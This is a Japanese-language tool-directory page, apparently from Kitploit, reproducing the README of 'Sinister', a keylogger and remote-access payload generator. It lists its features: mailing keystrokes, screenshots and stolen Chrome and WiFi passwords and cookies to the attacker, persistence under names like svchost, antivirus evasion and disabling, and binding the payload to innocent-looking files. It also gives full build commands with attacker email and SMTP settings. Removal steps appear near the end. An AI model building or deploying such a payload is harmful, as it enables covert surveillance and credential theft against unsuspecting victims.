Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Sinister — Sinisterは、キーログをメールで送信するWindows/Linux用キーロガージェネレーターで、その他の有益なターゲット情報も添付します。 | Kitploit
ツール/GitHubGitHub/pushpenderindia/sinister
パスワードクラッキングペイロード生成永続化メカニズムデータ流出情報収集ポストエクスプロイトレッドチーミングリモートアクセスツール
GitHubpushpenderindia/sinister

Sinister

Sinisterは、キーログをメールで送信するWindows/Linux用キーロガージェネレーターで、その他の有益なターゲット情報も添付します。

リポジトリを見る
465931年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sinister ロゴ

Sinister

ハッカー GIF

root@kitploit:~
                    この小さなPythonスクリプトは本当に素晴らしい仕事をしてくれます。

SinisterはWindows/Linux向けのキーロガージェネレーターで、キーログやスクリーンショットをメールで送信し、その他の重要なターゲット情報も一緒に送信します。Python 3で記述されています。

免責事項

:computer: このプロジェクトは良い目的と個人利用のためにのみ作成されました。

本ソフトウェアは「現状のまま」提供され、いかなる種類の保証もありません。お客様は自己責任で本ソフトウェアを使用してください。使用は全てエンドユーザーの責任です。開発者は一切の責任を負わず、本プログラムによって引き起こされた誤用や損害についても責任を負いません。

機能

  • Windows/Linuxで動作
  • 新しい被害者をメールで通知
  • 検出されない
  • 永続性
  • ペイロード生成前にメール認証情報を検証
  • GMAIL、YAHOO、OUTLOOK、カスタムSMTPなど、あらゆるメールプロバイダーでキーログを受信可能
  • SMTPサーバー/ポート
サーバー名SMTPサーバーSMTPポート
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • 被害者PCのスクリーンショットをメールで送信
  • 依存関係ゼロの実行可能バイナリを作成
  • 高度な機能を持つ約5MBのペイロードを作成
  • ペイロード生成前に難読化し、一部のアンチウイルスを回避
  • 生成されたペイロードはbase64でエンコードされ、リバースエンジニアリングが非常に困難
  • 被害者PCのアンチウイルスを停止し、セキュリティを無効化する機能
  • ペイロード生成のためのカラフルなインターフェース
  • 攻撃者側:ペイロード作成時に不足している依存関係を自動検出してインストール
  • アクティブウィンドウ名に基づいてログデータを区別(画像参照)
  • 悪意のあるファイルにカスタムアイコンを追加可能
  • 組み込みバインダー:キーロガーを任意のファイル[.pdf, .txt, .exeなど]にバインド可能。表向きは正当なファイルを実行し、バックエンドで悪意のあるコードをサービスとして実行。
  • システム上の既存のインスタンスをチェック。実行中のインスタンスがある場合は正当なファイルのみ実行(重複インスタンス禁止により重複メールログを防止)。
  • 攻撃者はLinuxシステムを使用してWindows/Linux両方のOS用のペイロードを作成/コンパイル可能。ただしWindowsマシンではWindows実行可能ファイルのみ作成/コンパイル可能。
  • 被害者システムから保存されたパスワードを取得し、攻撃者に送信。
組み込みスティーラーが盗むもの:
Chromeブラウザ(保存されたパスワード)
WiFi(保存されたパスワード)
Chromeクッキー(ログインデータ、クッキー、履歴)
Firefoxクッキー(cookies.sqlite)

注:カスタムスティーラーは独自にコーディングされており、LaZagneに依存していません。

  • 被害者デバイスの有用な情報を取得・送信
取得・送信されるもの:
オペレーティングシステム
コンピュータ名
ユーザー名
パブリックIPv4
  • ペイロードが実行できない場合は、--debugを指定してCMD付きのフォアグラウンドでexeを実行

重要

2022年5月30日、Googleは安全性の低いアプリのアクセス機能を削除しました。そのため、Gmailのパスワードの代わりに:

  • 攻撃者用Gmailで2段階認証を有効にする
  • アプリ固有のパスワードを作成する
  • ペイロード作成時にそのアプリ固有のパスワードを使用する
  • アプリ固有のパスワードの作成方法:こちらをクリック

動作確認済みOS

Kali) Kali Linux - ローリングエディション

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

前提条件

  • Python 3.X
  • いくつかの外部モジュール

Linuxでの使用方法

root@kitploit:~
# /optディレクトリに移動(任意)
$ cd /opt/

# このリポジトリをクローン
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Sinisterフォルダに移動
$ cd Sinister

# 依存関係のインストール
$ bash installer_linux.sh

*** installer_linux.sh実行中にPythonインストーラーのダイアログが表示された場合の注意 ***
    * カスタムインストールをクリック
    * パスを選択: C:/Python37-32
    ### これにより、Pythonはこのパス(Wine内)にインストールされます: ~/.wine/drive_c/Python37-32

# installer_linux.shの実行中にエラーが発生した場合は、installer_linux.pyを使用してインストールを試みてください
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# ペイロード/RATの作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# GMAIL SMTPサーバー、ポート設定を使用したペイロード作成(デフォルトSMTPサーバー = smtp.gmail.com、デフォルトSMTPポート = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# OUTLOOK SMTPサーバー、ポート設定を使用したペイロード作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# YAHOO SMTPサーバー、ポート設定を使用したペイロード作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

注:iconフォルダ内のカスタムアイコンも使用できます。例: --icon icon/pdf.ico

Windowsでの使用方法

root@kitploit:~
# 依存関係のインストール
$ 最新のPython 3.xをインストール

# このリポジトリをクローン
$ git clone https://github.com/PushpenderIndia/Sinister.git

# リポジトリに移動
$ cd Sinister

# 依存関係のインストール
$ python -m pip install -r requirements.txt

# Sinister.pyをテキストエディタで開き、16行目のWINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" を設定

# ヘルプメニューの表示
$ python Sinister.py --help

# ペイロード/RATの作成
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# GMAIL SMTPサーバー、ポート設定を使用したペイロード作成(デフォルトSMTPサーバー = smtp.gmail.com、デフォルトSMTPポート = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# OUTLOOK SMTPサーバー、ポート設定を使用したペイロード作成
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# YAHOO SMTPサーバー、ポート設定を使用したペイロード作成
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

注:iconフォルダ内のカスタムアイコンも使用できます。例: --icon icon/pdf.ico

更新方法

  • 自動更新するにはupdater.pyを実行するか、このGitHubリポジトリから最新のZipファイルをダウンロードしてください。
  • 注:updater.pyを使用するにはGitがインストールされている必要があります。

注:悪意のあるファイルはSinister/フォルダ内のdist/フォルダに保存されます。

利用可能な引数

  • オプション引数

注:-w/--windows または -l/--linux のいずれかを指定する必要があります。

  • 必須引数

新しいスクリーンショット:

ヘルプの表示

ペイロードの生成

レポートの受信

アクティブウィンドウ名に基づいてログデータを区別 ~ v1.3以降で追加された機能

Chromeブラウザの保存済みパスワードを取得・送信

  • 注:この機能を使用するには、キーロガー作成時に -s または --steal-password を指定してください

保存済みWIFIパスワードを取得・送信

  • 注:この機能を使用するには、キーロガー作成時に -s または --steal-password を指定してください

古い画像も参照

~古いスクリーンショット:

ヘルプの表示

Sinister.pyスクリプトの実行

ビルド完了

キーロガーが実行されると、レジストリを追加して永続化

自身のコピーを作成し、Roaming内に保存

キーロガーテストのためのランダムテキスト入力

Sinisterによって送信されたレポート1

Facebookログイン ~ 被害者

レポート2 - Facebook認証情報のキーログ

レポート3 - スクリーンショット付き

デバッグに関する問題

オフラインキーロガーを実行してオフラインキーログのキャプチャをテストし、以下のコマンドを実行してキーロガーの問題をデバッグしてください:

test_key.pyを[コンパイル済みと生の]両方のモードで実行し、エラーを特定してください。

次のように実行:python test_key.py

次のようにコンパイルも行ってください: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

実行後、何か入力し始めると、10秒ごとにコマンドプロンプトに結果が表示されます。

オフラインキーロガーのファイルはTestKeyloggerフォルダにあります。

  • 被害者のシステムでペイロードが実行できない場合
root@kitploit:~
1. --debugフラグを付けて新しいペイロードを作成
2. cmdからペイロードのexeを実行 [ダブルクリックで実行しないでください]
3. CMDにてより詳細なエラーが表示されるので、その問題をIssueセクションに報告してください

WindowsでのSinisterの削除方法:

方法1:

  • スタートからregeditと入力し、最初のプログラムを実行してレジストリエディタを開きます。
  • 次のパスに移動:Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 「svchost」というエントリがあるので、右クリックして削除を選択します。
  • ユーザーパス > AppData > Roaming に移動すると、「svchost.exe」というファイルがあります。これがRATなので、右クリック > 削除します。
  • システムを再起動します。

方法2:

  • 感染したシステムで「RemoveSinister.bat」を実行し、PCを再起動して現在実行中の悪意のあるファイルを停止します。

LinuxでのSinisterの削除方法:

  • 任意のテキストエディタでAutostartファイルを開きます。 Autostartファイルのパス: ~/.config/autostart/xinput.desktop

  • 以下の5行を削除します:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • 注:destination_file_name は -o パラメータでキーロガーに指定した悪意のあるファイルの名前です。

  • システムを再起動し、以下のパスに保存されている悪意のあるファイルを削除します。

  • キーロガーの保存先パス: ~/.config/xnput

コントリビューター

  • 専任のコントリビューターリスト: Contributors

あらゆる種類のコントリビューションを歓迎します!

注:コントリビューターリストに載っているべきなのに忘れられていた場合は、お知らせください!

TODO

  • 独自の機能を提案
  • 新機能の追加
  • GUI版のコントリビュート
ツールをダウンロード
省略形完全形説明
-h--helpこのヘルプメッセージを表示して終了
-i INTERVAL--interval INTERVALレポート間の秒数。デフォルト=120
-t TIME_PERSISTENT--persistence TIME_PERSISTENT__秒後に永続化。デフォルト=10
-x SMTP_Server--smtpカスタムSMTPサーバー。デフォルト="smtp.gmail.com"
-y SMTP_Port--portカスタムSMTPポート。デフォルト=587
-w--windowsWindows実行可能ファイルを生成。
-l--linuxLinux実行可能ファイルを生成。
-s--steal-password被害者マシンから保存されたパスワードを盗む[対応OS: Windows]
-b file.txt--bind LEGITIMATE_FILE_PATH.pdf自動バインダー:正当なファイルのパスを指定。[対応OS: Windows]
-d--debugペイロードをCMDウィンドウ付きのフォアグラウンドで実行し、適切な実行エラーを取得
省略形完全形説明
--icon ICONアイコンパスを指定、悪意のあるファイルのアイコン[注:.ico形式である必要があります]
-e EMAIL--email EMAILレポートの送信先メールアドレス。
-p PASSWORD--password PASSWORD-e引数で指定したメールアドレスのパスワード。
-o OUT--out OUT出力ファイル名。

Pushpender Singh

:computer:

Thomas Kunwar

:computer:

krasnova19

:computer:

sarchish5

:computer:

chiragcode11

:computer:

C4RR0T02

:computer: